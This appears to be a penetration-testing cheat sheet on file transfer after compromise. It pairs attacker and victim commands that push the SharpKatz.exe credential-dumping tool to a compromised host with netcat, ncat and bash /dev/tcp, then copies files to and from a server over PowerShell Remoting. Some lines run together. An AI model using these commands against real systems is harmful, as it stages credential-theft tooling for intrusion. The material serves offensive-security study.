Misc
File Transfer with Netcat and Ncat
Netcat - Attack Host - Sending File to Compromised machine. The option
-q 0gonna close connection after transferring.
# Using original netcat
victim$ nc -l -p 8000 > SharpKatz.exeattacker$ nc -q 0 13.13.13.13 8000 < SharpKatz.exeNcat - Attack Host - Sending File to Compromised machine
# Using Ncat
victim$ ncat -l -p 8000 --recv-only > SharpKatz.exeattacker$ ncat --send-only 13.13.13.13 8000 < SharpKatz.exeSending File as Input to Netcat
attacker$ sudo nc -l -p 443 -q 0 < SharpKatz.exevictim$ nc 13.13.13.13 443 > SharpKatz.exeSending File as Input to Ncat
attacker$ sudo ncat -l -p 443 --send-only < SharpKatz.exevictim$ ncat 13.13.13.13 443 --recv-only > SharpKatz.exeSending File from Attacker machine to Compromised using /dev/tcp
# Netcat option
attacker$ sudo nc -l -p 443 -q 0 < SharpKatz.exe# Ncat option
attacker$ sudo ncat -l -p 443 --send-only < SharpKatz.exe# Connecting to netcat using /dev/tcp
victim$
cat < /dev/tcp/13.13.13.13/443 > SharpKatz.exePowerShell Session File Transfer
I know I used to show about PowerShell file transfers in Windows File Transfer section, but there are possibilities when no HTTP, HTTPS or SMB are available. So here we'll use PowerShell Remoting aka WinRM. Usually work on TCP/5985 port for HTTP and TCP/5986 port for HTTPS.
Check TCP 5985 Port on DATABASE01
PS C:\carnifex17> Test-NetConnection -ComputerName DATABASE01 -Port 5985Create a PowerShell Remoting Session to DATABASE01
PS C:\Desktop> $Session = New-PSSession -ComputerName DATABASE01Copy samplefile.txt from our Localhost to the DATABASE01 Session
PS C:\Desktop> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\Copy DATABASE.txt from DATABASE01 Session to our Localhost
PS C:\Desktop> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $SessionLast updated